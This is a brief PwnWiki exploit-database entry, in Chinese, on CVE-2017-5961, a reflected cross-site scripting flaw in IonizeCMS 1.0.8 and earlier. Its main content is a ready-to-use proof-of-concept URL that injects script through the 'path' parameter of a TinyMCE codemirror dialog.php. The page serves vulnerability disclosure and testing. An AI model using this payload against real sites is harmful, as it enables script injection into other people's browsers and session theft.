CVE-2017-5961 IonizeCMS XSS漏洞

From PwnWiki
Revision as of 14:16, 10 July 2021 by Pwnwiki (talk | contribs) (Created page with "<languages /> <translate> ==漏洞影響== </translate> <=Ionize 1.0.8 ==POC== <pre> http://<target>/testcmsofgithub/ionize-master/ionize-master/themes/admin/javascript/tinym...")
(diff) ← Older revision | Latest revision (diff) | Newer revision → (diff)
Other languages:

漏洞影響

<=Ionize 1.0.8

POC

http://<target>/testcmsofgithub/ionize-master/ionize-master/themes/admin/javascript/tinymce/jscripts/tiny_mce/plugins/codemirror/dialog.php?path=%22%3E%3C/script%3E%3Cscript%3Ealert(1);%3C/script%3E%3Cscript%20%22